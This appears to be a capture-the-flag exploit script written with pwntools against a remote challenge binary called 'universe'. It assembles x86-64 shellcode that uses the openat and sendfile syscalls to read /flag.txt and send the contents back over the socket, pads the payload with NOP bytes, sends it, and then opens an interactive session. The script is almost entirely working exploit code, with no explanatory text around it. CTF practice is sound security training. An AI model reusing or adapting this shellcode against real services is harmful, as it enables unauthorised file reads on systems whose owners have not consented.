#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./universe", checksec=False)
# r = process()
r = remote("challenge.bugpwn.com", 1004)

# openat + sendfile
shellcode="""
lea rsi, [rdx+30]
xor rdx, rdx
xor r10, r10
add ax, 257
syscall
mov rsi, rax
mov al, 40
shr edi, 255
add r10b, 255
syscall
"""
shellcode = asm(shellcode)
shellcode += b"/flag.txt\0"
shellcode += b"\x90"*(4096-len(shellcode))
r.sendline(shellcode)

r.interactive()